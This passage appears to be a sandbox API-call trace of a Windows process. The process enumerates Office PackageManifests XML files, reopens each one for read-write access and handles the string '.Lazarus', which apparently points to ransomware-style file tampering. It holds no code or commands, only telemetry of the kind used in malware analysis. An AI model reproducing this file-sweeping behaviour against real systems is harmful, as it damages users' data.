Parameter=0x1086e48, Context=0x0) returned 1 [0099.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x898f8 | out: hHeap=0x20000) returned 1 [0099.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0099.278] AreFileApisANSI () returned 1 [0099.278] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 105 [0099.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0099.278] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.278] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0099.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0099.278] AreFileApisANSI () returned 1 [0099.278] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75c60, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0099.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0099.278] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75c60, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml") returned 105 [0099.279] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-3101-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0099.279] GetFileType (hFile=0x360) returned 0x1 [0099.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.279] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0099.279] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0099.279] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0099.279] CloseHandle (hObject=0x360) returned 1 [0099.280] AreFileApisANSI () returned 1 [0099.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75c60, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0099.280] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0099.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75c60, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml") returned 105 [0099.280] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-3101-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0099.280] GetFileType (hFile=0x360) returned 0x1 [0099.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.280] CloseHandle (hObject=0x360) returned 1 [0099.280] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.280] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0099.280] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.280] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0099.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0099.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.280] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0099.280] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0099.280] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0099.280] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0099.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0099.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0099.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0099.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0099.280] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0099.280] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0099.280] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0099.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0099.281] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0099.281] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0099.281] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0099.281] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0099.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0099.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0099.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0099.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0099.281] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0099.281] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0099.281] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0099.281] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0099.281] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0099.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0099.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0099.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0099.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0099.281] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0099.281] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0099.281] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0099.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0099.281] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0099.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0099.281] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0099.281] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0099.281] AreFileApisANSI () returned 1 [0099.281] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75c60, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0099.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0099.281] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75c60, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml") returned 105 [0099.281] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-3101-0000-1000-0000000ff1ce.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x83ea71ba, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x83ea71ba, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x84214453, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xd2f)) returned 1 [0099.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0099.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0099.282] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.282] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.282] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x834f7581, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x834f7581, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83e80c2c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x212876, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AppXManifest.common.xml", cAlternateFileName="AP3FD6~1.XML")) returned 1 [0099.282] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0099.282] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0099.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0099.282] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0099.282] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0099.282] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0099.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0099.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0099.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0099.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0099.282] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0099.282] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0099.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0099.282] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0099.282] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0099.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0099.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0099.282] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0099.282] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0099.282] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0099.282] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f848 [0099.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0099.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0099.282] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c458 [0099.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f848 | out: hHeap=0x20000) returned 1 [0099.282] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.282] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.282] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.283] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.283] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c458 | out: hHeap=0x20000) returned 1 [0099.283] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0099.283] AreFileApisANSI () returned 1 [0099.283] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml", lpUsedDefaultChar=0x0) returned 75 [0099.283] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0099.283] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.283] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.283] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0099.283] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0099.283] AreFileApisANSI () returned 1 [0099.283] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0099.283] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x85260 [0099.283] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x85260, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml") returned 75 [0099.283] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.common.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0099.283] GetFileType (hFile=0x360) returned 0x1 [0099.283] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85260 | out: hHeap=0x20000) returned 1 [0099.284] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0099.284] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0099.284] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0099.284] CloseHandle (hObject=0x360) returned 1 [0099.284] AreFileApisANSI () returned 1 [0099.284] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0099.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x85d00 [0099.284] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x85d00, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml") returned 75 [0099.284] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.common.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0099.284] GetFileType (hFile=0x360) returned 0x1 [0099.284] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85d00 | out: hHeap=0x20000) returned 1 [0099.285] CloseHandle (hObject=0x360) returned 1 [0099.285] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.285] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0099.285] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0099.285] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.285] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0099.285] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0099.285] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.285] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0099.285] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0099.285] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0099.285] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0099.285] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0099.285] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0099.285] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.285] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0099.285] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0099.285] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e308 [0099.285] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0099.285] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0099.285] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0099.285] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e308 | out: hHeap=0x20000) returned 1 [0099.285] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0099.285] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0099.285] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0099.285] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0099.285] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e308 [0099.285] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0099.285] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e308 | out: hHeap=0x20000) returned 1 [0099.285] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0099.285] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0099.285] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0099.285] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0099.285] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0099.286] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0099.286] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0099.286] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0099.286] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0099.286] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0099.286] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0099.286] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0099.286] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0099.286] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0099.286] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0099.286] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0099.286] AreFileApisANSI () returned 1 [0099.286] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0099.286] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x85da0 [0099.286] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x85da0, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml") returned 75 [0099.286] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.common.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x834f7581, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x834f7581, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83e80c2c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x212876)) returned 1 [0099.286] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85da0 | out: hHeap=0x20000) returned 1 [0099.286] AreFileApisANSI () returned 1 [0099.286] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x313f4e8, cbMultiByte=-1, lpWideCharStr=0x313f500, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0099.286] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0099.286] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.286] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.286] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.286] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0099.286] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.286] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.286] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.286] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d2c0 [0099.286] GetLastError () returned 0x0 [0099.286] SetLastError (dwErrCode=0x0) [0099.286] AreFileApisANSI () returned 1 [0099.286] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0099.286] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x85120 